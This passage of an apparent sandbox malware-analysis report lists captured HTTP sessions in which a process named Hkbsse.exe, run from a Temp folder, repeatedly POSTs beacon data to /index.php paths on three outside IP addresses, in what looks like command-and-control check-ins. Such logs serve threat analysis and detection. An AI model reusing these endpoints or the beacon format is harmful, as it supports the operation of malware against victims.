Aug 27, 2024 14:20:19.802854061 CEST	156	OUT	POST /hb9IvshS02/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 89.23.103.42 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
113	192.168.2.6	52328	185.208.158.116	80	7108	C:\Users\user\AppData\Local\Temp\239f17af5a\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Aug 27, 2024 14:20:20.551295996 CEST	159	OUT	POST /hb9IvshS01/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.208.158.116 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Aug 27, 2024 14:20:21.332149029 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.14.0 (Ubuntu) Date: Tue, 27 Aug 2024 12:20:21 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Aug 27, 2024 14:20:21.334660053 CEST	317	OUT	POST /hb9IvshS01/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.208.158.116 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 38 41 34 39 33 32 35 30 34 31 31 44 34 42 38 32 31 39 33 45 39 35 45 35 42 42 31 37 41 33 44 35 37 36 35 45 37 42 39 36 46 42 44 32 42 42 31 33 45 43 42 39 34 35 45 42 44 31 41 32 31 38 43 42 35 38 39 30 42 38 44 42 39 39 38 32 36 45 31 37 43 42 35 33 32 30 37 30 38 41 46 33 33 36 37 41 43 30 41 31 37 46 43 36 45 30 38 46 41 32 38 36 31 32 31 35 37 35 31 33 44 42 37 43 33 34 39 34 37 36 30 36 36 33 37 35 39 36 34 46 33 43 38 32 38 36 45 46 43 37 30 46 34 43 38 36 31 43 Data Ascii: r=8A493250411D4B82193E95E5BB17A3D5765E7B96FBD2BB13ECB945EBD1A218CB5890B8DB99826E17CB5320708AF3367AC0A17FC6E08FA28612157513DB7C349476066375964F3C8286EFC70F4C861C
Aug 27, 2024 14:20:21.850442886 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.14.0 (Ubuntu) Date: Tue, 27 Aug 2024 12:20:21 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0
Aug 27, 2024 14:20:21.851082087 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.14.0 (Ubuntu) Date: Tue, 27 Aug 2024 12:20:21 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
114	192.168.2.6	52329	185.209.162.226	80	7108	C:\Users\user\AppData\Local\Temp\239f17af5a\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Aug 27, 2024 14:20:21.852638006 CEST	159	OUT	POST /hb9IvshS03/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.209.162.226 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
115	192.168.2.6	52330	185.208.158.116	80	7108	C:\Users\user\AppData\Local\Temp\239f17af5a\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Aug 27, 2024 14:20:21.957386971 CEST	159	OUT	POST /hb9IvshS01/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.208.158.116 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Aug 27, 2024 14:20:22.654274940 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.14.0 (Ubuntu) Date: Tue, 27 Aug 2024 12:20:22 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Aug 27, 2024 14:20:22.655078888 CEST	317	OUT	POST /hb9IvshS01/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.208.158.116 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 38 41 34 39 33 32 35 30 34 31 31 44 34 42 38 32 31 39 33 45 39 35 45 35 42 42 31 37 41 33 44 35 37 36 35 45 37 42 39 36 46 42 44 32 42 42 31 33 45 43 42 39 34 35 45 42 44 31 41 32 31 38 43 42 35 38 39 30 42 38 44 42 39 39 38 32 36 45 31 37 43 42 35 33 32 30 37 30 38 41 46 33 33 36 37 41 43 30 41 31 37 46 43 36 45 30 38 46 41 32 38 36 31 32 31 35 37 35 31 33 44 42 37 43 33 34 39 34 37 36 30 36 36 33 37 35 39 36 34 46 33 43 38 32 38 36 45 46 43 37 30 46 34 43 38 36 31 43 Data Ascii: r=8A493250411D4B82193E95E5BB17A3D5765E7B96FBD2BB13ECB945EBD1A218CB5890B8DB99826E17CB5320708AF3367AC0A17FC6E08FA28612157513DB7C349476066375964F3C8286EFC70F4C861C
Aug 27, 2024 14:20:22.975404978 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.14.0 (Ubuntu) Date: Tue, 27 Aug 2024 12:20:22 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
116	192.168.2.6	52331	185.208.158.116	80	7108	C:\Users\user\AppData\Local\Temp\239f17af5a\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Aug 27, 2024 14:20:23.082490921 CEST	159	OUT	POST /hb9IvshS01/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.208.158.116 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
117	192.168.2.6	52332	185.209.162.226	80	7108	C:\Users\user\AppData\Local\Temp\239f17af5a\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Aug 27, 2024 14:20:23.458836079 CEST	317	OUT	POST /hb9IvshS03/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.209.162.226 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 38 41 34 39 33 32 35 30 34 31 31 44 34 42 38 32 31 39 33 45 39 35 45 35 42 42 31 37 41 33 44 35 37 36 35 45 37 42 39 36 46 42 44 32 42 42 31 33 45 43 42 39 34 35 45 42 44 31 41 32 31 38 43 42 35 38 39 30 42 38 44 42 39 39 38 32 36 45 31 37 43 42 35 33 32 30 37 30 38 41 46 33 33 36 37 41 43 30 41 31 37 46 43 36 45 30 38 46 41 32 38 36 31 32 31 35 37 35 31 33 44 42 37 43 33 34 39 34 37 36 30 36 36 33 37 35 39 36 34 46 33 43 38 32 38 36 45 46 43 37 30 46 34 43 38 36 31 43 Data Ascii: r=8A493250411D4B82193E95E5BB17A3D5765E7B96FBD2BB13ECB945EBD1A218CB5890B8DB99826E17CB5320708AF3367AC0A17FC6E08FA28612157513DB7C349476066375964F3C8286EFC70F4C861C

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
118	192.168.2.6	52333	185.208.158.116	80	7108	C:\Users\user\AppData\Local\Temp\239f17af5a\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Aug 27, 2024 14:20:23.707832098 CEST	317	OUT	POST /hb9IvshS01/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.208.158.116 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 38 41 34 39 33 32 35 30 34 31 31 44 34 42 38 32 31 39 33 45 39 35 45 35 42 42 31 37 41 33 44 35 37 36 35 45 37 42 39 36 46 42 44 32 42 42 31 33 45 43 42 39 34 35 45 42 44 31 41 32 31 38 43 42 35 38 39 30 42 38 44 42 39 39 38 32 36 45 31 37 43 42 35 33 32 30 37 30 38 41 46 33 33 36 37 41 43 30 41 31 37 46 43 36 45 30 38 46 41 32 38 36 31 32 31 35 37 35 31 33 44 42 37 43 33 34 39 34 37 36 30 36 36 33 37 35 39 36 34 46 33 43 38 32 38 36 45 46 43 37 30 46 34 43 38 36 31 43 Data Ascii: r=8A493250411D4B82193E95E5BB17A3D5765E7B96FBD2BB13ECB945EBD1A218CB5890B8DB99826E17CB5320708AF3367AC0A17FC6E08FA28612157513DB7C349476066375964F3C8286EFC70F4C861C
Aug 27, 2024 14:20:24.430634975 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.14.0 (Ubuntu) Date: Tue, 27 Aug 2024 12:20:24 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
119	192.168.2.6	52334	89.23.103.42	80	7108	C:\Users\user\AppData\Local\Temp\239f17af5a\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Aug 27, 2024 14:20:23.709542990 CEST	314	OUT	POST /hb9IvshS02/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 89.23.103.42 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 38 41 34 39 33 32 35 30 34 31 31 44 34 42 38 32 31 39 33 45 39 35 45 35 42 42 31 37 41 33 44 35 37 36 35 45 37 42 39 36 46 42 44 32 42 42 31 33 45 43 42 39 34 35 45 42 44 31 41 32 31 38 43 42 35 38 39 30 42 38 44 42 39 39 38 32 36 45 31 37 43 42 35 33 32 30 37 30 38 41 46 33 33 36 37 41 43 30 41 31 37 46 43 36 45 30 38 46 41 32 38 36 31 32 31 35 37 35 31 33 44 42 37 43 33 34 39 34 37 36 30 36 36 33 37 35 39 36 34 46 33 43 38 32 38 36 45 46 43 37 30 46 34 43 38 36 31 43 Data Ascii: r=8A493250411D4B82193E95E5BB17A3D5765E7B96FBD2BB13ECB945EBD1A218CB5890B8DB99826E17CB5320708AF3367AC0A17FC6E08FA28612157513DB7C349476066375964F3C8286EFC70F4C861C

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
120	192.168.2.6	52335	185.209.162.226	80	7108	C:\Users\user\AppData\Local\Temp\239f17af5a\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Aug 27, 2024 14:20:23.817884922 CEST	159	OUT	POST /hb9IvshS03/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.209.162.226 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
121	192.168.2.6	52336	185.208.158.116	80	7108	C:\Users\user\AppData\Local\Temp\239f17af5a\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Aug 27, 2024 14:20:24.552720070 CEST	159	OUT	POST /hb9IvshS01/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.208.158.116 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Aug 27, 2024 14:20:25.249069929 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.14.0 (Ubuntu) Date: Tue, 27 Aug 2024 12:20:25 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Aug 27, 2024 14:20:25.250020981 CEST	317	OUT	POST /hb9IvshS01/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.208.158.116 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 38 41 34 39 33 32 35 30 34 31 31 44 34 42 38 32 31 39 33 45 39 35 45 35 42 42 31 37 41 33 44 35 37 36 35 45 37 42 39 36 46 42 44 32 42 42 31 33 45 43 42 39 34 35 45 42 44 31 41 32 31 38 43 42 35 38 39 30 42 38 44 42 39 39 38 32 36 45 31 37 43 42 35 33 32 30 37 30 38 41 46 33 33 36 37 41 43 30 41 31 37 46 43 36 45 30 38 46 41 32 38 36 31 32 31 35 37 35 31 33 44 42 37 43 33 34 39 34 37 36 30 36 36 33 37 35 39 36 34 46 33 43 38 32 38 36 45 46 43 37 30 46 34 43 38 36 31 43 Data Ascii: r=8A493250411D4B82193E95E5BB17A3D5765E7B96FBD2BB13ECB945EBD1A218CB5890B8DB99826E17CB5320708AF3367AC0A17FC6E08FA28612157513DB7C349476066375964F3C8286EFC70F4C861C
Aug 27, 2024 14:20:25.500160933 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.14.0 (Ubuntu) Date: Tue, 27 Aug 2024 12:20:25 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
122	192.168.2.6	52337	185.209.162.226	80	7108	C:\Users\user\AppData\Local\Temp\239f17af5a\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Aug 27, 2024 14:20:25.414700031 CEST	317	OUT	POST /hb9IvshS03/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.209.162.226 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 38 41 34 39 33 32 35 30 34 31 31 44 34 42 38 32 31 39 33 45 39 35 45 35 42 42 31 37 41 33 44 35 37 36 35 45 37 42 39 36 46 42 44 32 42 42 31 33 45 43 42 39 34 35 45 42 44 31 41 32 31 38 43 42 35 38 39 30 42 38 44 42 39 39 38 32 36 45 31 37 43 42 35 33 32 30 37 30 38 41 46 33 33 36 37 41 43 30 41 31 37 46 43 36 45 30 38 46 41 32 38 36 31 32 31 35 37 35 31 33 44 42 37 43 33 34 39 34 37 36 30 36 36 33 37 35 39 36 34 46 33 43 38 32 38 36 45 46 43 37 30 46 34 43 38 36 31 43 Data Ascii: r=8A493250411D4B82193E95E5BB17A3D5765E7B96FBD2BB13ECB945EBD1A218CB5890B8DB99826E17CB5320708AF3367AC0A17FC6E08FA28612157513DB7C349476066375964F3C8286EFC70F4C861C

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
123	192.168.2.6	52338	185.208.158.116	80	7108	C:\Users\user\AppData\Local\Temp\239f17af5a\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Aug 27, 2024 14:20:25.613704920 CEST	159	OUT	POST /hb9IvshS01/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.208.158.116 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Aug 27, 2024 14:20:26.330468893 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.14.0 (Ubuntu) Date: Tue, 27 Aug 2024 12:20:26 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Aug 27, 2024 14:20:26.331401110 CEST	317	OUT	POST /hb9IvshS01/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.208.158.116 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 38 41 34 39 33 32 35 30 34 31 31 44 34 42 38 32 31 39 33 45 39 35 45 35 42 42 31 37 41 33 44 35 37 36 35 45 37 42 39 36 46 42 44 32 42 42 31 33 45 43 42 39 34 35 45 42 44 31 41 32 31 38 43 42 35 38 39 30 42 38 44 42 39 39 38 32 36 45 31 37 43 42 35 33 32 30 37 30 38 41 46 33 33 36 37 41 43 30 41 31 37 46 43 36 45 30 38 46 41 32 38 36 31 32 31 35 37 35 31 33 44 42 37 43 33 34 39 34 37 36 30 36 36 33 37 35 39 36 34 46 33 43 38 32 38 36 45 46 43 37 30 46 34 43 38 36 31 43 Data Ascii: r=8A493250411D4B82193E95E5BB17A3D5765E7B96FBD2BB13ECB945EBD1A218CB5890B8DB99826E17CB5320708AF3367AC0A17FC6E08FA28612157513DB7C349476066375964F3C8286EFC70F4C861C
Aug 27, 2024 14:20:26.575289965 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.14.0 (Ubuntu) Date: Tue, 27 Aug 2024 12:20:26 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
124	192.168.2.6	52339	185.208.158.116	80	7108	C:\Users\user\AppData\Local\Temp\239f17af5a\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Aug 27, 2024 14:20:26.691559076 CEST	159	OUT	POST /hb9IvshS01/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.208.158.116 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Aug 27, 2024 14:20:27.377721071 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.14.0 (Ubuntu) Date: Tue, 27 Aug 2024 12:20:27 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Aug 27, 2024 14:20:27.379753113 CEST	317	OUT	POST /hb9IvshS01/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.208.158.116 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 38 41 34 39 33 32 35 30 34 31 31 44 34 42 38 32 31 39 33 45 39 35 45 35 42 42 31 37 41 33 44 35 37 36 35 45 37 42 39 36 46 42 44 32 42 42 31 33 45 43 42 39 34 35 45 42 44 31 41 32 31 38 43 42 35 38 39 30 42 38 44 42 39 39 38 32 36 45 31 37 43 42 35 33 32 30 37 30 38 41 46 33 33 36 37 41 43 30 41 31 37 46 43 36 45 30 38 46 41 32 38 36 31 32 31 35 37 35 31 33 44 42 37 43 33 34 39 34 37 36 30 36 36 33 37 35 39 36 34 46 33 43 38 32 38 36 45 46 43 37 30 46 34 43 38 36 31 43 Data Ascii: r=8A493250411D4B82193E95E5BB17A3D5765E7B96FBD2BB13ECB945EBD1A218CB5890B8DB99826E17CB5320708AF3367AC0A17FC6E08FA28612157513DB7C349476066375964F3C8286EFC70F4C861C
Aug 27, 2024 14:20:27.616321087 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.14.0 (Ubuntu) Date: Tue, 27 Aug 2024 12:20:27 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
125	192.168.2.6	52340	185.209.162.226	80	7108	C:\Users\user\AppData\Local\Temp\239f17af5a\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Aug 27, 2024 14:20:27.131203890 CEST	159	OUT	POST /hb9IvshS03/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.209.162.226 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
126	192.168.2.6	52341	185.208.158.116	80	7108	C:\Users\user\AppData\Local\Temp\239f17af5a\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Aug 27, 2024 14:20:27.722986937 CEST	159	OUT	POST /hb9IvshS01/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.208.158.116 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Aug 27, 2024 14:20:28.500401974 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.14.0 (Ubuntu) Date: Tue, 27 Aug 2024 12:20:28 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Aug 27, 2024 14:20:28.501068115 CEST	317	OUT	POST /hb9IvshS01/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.208.158.116 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 38 41 34 39 33 32 35 30 34 31 31 44 34 42 38 32 31 39 33 45 39 35 45 35 42 42 31 37 41 33 44 35 37 36 35 45 37 42 39 36 46 42 44 32 42 42 31 33 45 43 42 39 34 35 45 42 44 31 41 32 31 38 43 42 35 38 39 30 42 38 44 42 39 39 38 32 36 45 31 37 43 42 35 33 32 30 37 30 38 41 46 33 33 36 37 41 43 30 41 31 37 46 43 36 45 30 38 46 41 32 38 36 31 32 31 35 37 35 31 33 44 42 37 43 33 34 39 34 37 36 30 36 36 33 37 35 39 36 34 46 33 43 38 32 38 36 45 46 43 37 30 46 34 43 38 36 31 43 Data Ascii: r=8A493250411D4B82193E95E5BB17A3D5765E7B96FBD2BB13ECB945EBD1A218CB5890B8DB99826E17CB5320708AF3367AC0A17FC6E08FA28612157513DB7C349476066375964F3C8286EFC70F4C861C
Aug 27, 2024 14:20:28.738847971 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.14.0 (Ubuntu) Date: Tue, 27 Aug 2024 12:20:28 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
127	192.168.2.6	52342	185.209.162.226	80	7108	C:\Users\user\AppData\Local\Temp\239f17af5a\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Aug 27, 2024 14:20:27.723905087 CEST	317	OUT	POST /hb9IvshS03/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.209.162.226 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 38 41 34 39 33 32 35 30 34 31 31 44 34 42 38 32 31 39 33 45 39 35 45 35 42 42 31 37 41 33 44 35 37 36 35 45 37 42 39 36 46 42 44 32 42 42 31 33 45 43 42 39 34 35 45 42 44 31 41 32 31 38 43 42 35 38 39 30 42 38 44 42 39 39 38 32 36 45 31 37 43 42 35 33 32 30 37 30 38 41 46 33 33 36 37 41 43 30 41 31 37 46 43 36 45 30 38 46 41 32 38 36 31 32 31 35 37 35 31 33 44 42 37 43 33 34 39 34 37 36 30 36 36 33 37 35 39 36 34 46 33 43 38 32 38 36 45 46 43 37 30 46 34 43 38 36 31 43 Data Ascii: r=8A493250411D4B82193E95E5BB17A3D5765E7B96FBD2BB13ECB945EBD1A218CB5890B8DB99826E17CB5320708AF3367AC0A17FC6E08FA28612157513DB7C349476066375964F3C8286EFC70F4C861C

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
128	192.168.2.6	52343	89.23.103.42	80	7108	C:\Users\user\AppData\Local\Temp\239f17af5a\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Aug 27, 2024 14:20:27.834265947 CEST	156	OUT	POST /hb9IvshS02/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 89.23.103.42 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
129	192.168.2.6	52344	185.208.158.116	80	7108	C:\Users\user\AppData\Local\Temp\239f17af5a\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Aug 27, 2024 14:20:28.849899054 CEST	159	OUT	POST /hb9IvshS01/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.208.158.116 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Aug 27, 2024 14:20:29.555139065 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.14.0 (Ubuntu) Date: Tue, 27 Aug 2024 12:20:29 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Aug 27, 2024 14:20:29.556054115 CEST	317	OUT	POST /hb9IvshS01/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.208.158.116 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 38 41 34 39 33 32 35 30 34 31 31 44 34 42 38 32 31 39 33 45 39 35 45 35 42 42 31 37 41 33 44 35 37 36 35 45 37 42 39 36 46 42 44 32 42 42 31 33 45 43 42 39 34 35 45 42 44 31 41 32 31 38 43 42 35 38 39 30 42 38 44 42 39 39 38 32 36 45 31 37 43 42 35 33 32 30 37 30 38 41 46 33 33 36 37 41 43 30 41 31 37 46 43 36 45 30 38 46 41 32 38 36 31 32 31 35 37 35 31 33 44 42 37 43 33 34 39 34 37 36 30 36 36 33 37 35 39 36 34 46 33 43 38 32 38 36 45 46 43 37 30 46 34 43 38 36 31 43 Data Ascii: r=8A493250411D4B82193E95E5BB17A3D5765E7B96FBD2BB13ECB945EBD1A218CB5890B8DB99826E17CB5320708AF3367AC0A17FC6E08FA28612157513DB7C349476066375964F3C8286EFC70F4C861C
Aug 27, 2024 14:20:29.799597979 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.14.0 (Ubuntu) Date: Tue, 27 Aug 2024 12:20:29 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
130	192.168.2.6	52345	185.209.162.226	80	7108	C:\Users\user\AppData\Local\Temp\239f17af5a\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Aug 27, 2024 14:20:29.463315964 CEST	159	OUT	POST /hb9IvshS03/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.209.162.226 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
131	192.168.2.6	52346	185.208.158.116	80	7108	C:\Users\user\AppData\Local\Temp\239f17af5a\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Aug 27, 2024 14:20:29.910763979 CEST	159	OUT	POST /hb9IvshS01/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.208.158.116 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Aug 27, 2024 14:20:30.601449966 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.14.0 (Ubuntu) Date: Tue, 27 Aug 2024 12:20:30 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Aug 27, 2024 14:20:30.604413033 CEST	317	OUT	POST /hb9IvshS01/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.208.158.116 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 38 41 34 39 33 32 35 30 34 31 31 44 34 42 38 32 31 39 33 45 39 35 45 35 42 42 31 37 41 33 44 35 37 36 35 45 37 42 39 36 46 42 44 32 42 42 31 33 45 43 42 39 34 35 45 42 44 31 41 32 31 38 43 42 35 38 39 30 42 38 44 42 39 39 38 32 36 45 31 37 43 42 35 33 32 30 37 30 38 41 46 33 33 36 37 41 43 30 41 31 37 46 43 36 45 30 38 46 41 32 38 36 31 32 31 35 37 35 31 33 44 42 37 43 33 34 39 34 37 36 30 36 36 33 37 35 39 36 34 46 33 43 38 32 38 36 45 46 43 37 30 46 34 43 38 36 31 43 Data Ascii: r=8A493250411D4B82193E95E5BB17A3D5765E7B96FBD2BB13ECB945EBD1A218CB5890B8DB99826E17CB5320708AF3367AC0A17FC6E08FA28612157513DB7C349476066375964F3C8286EFC70F4C861C
Aug 27, 2024 14:20:30.839601994 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.14.0 (Ubuntu) Date: Tue, 27 Aug 2024 12:20:30 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
132	192.168.2.6	52347	185.208.158.116	80	7108	C:\Users\user\AppData\Local\Temp\239f17af5a\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
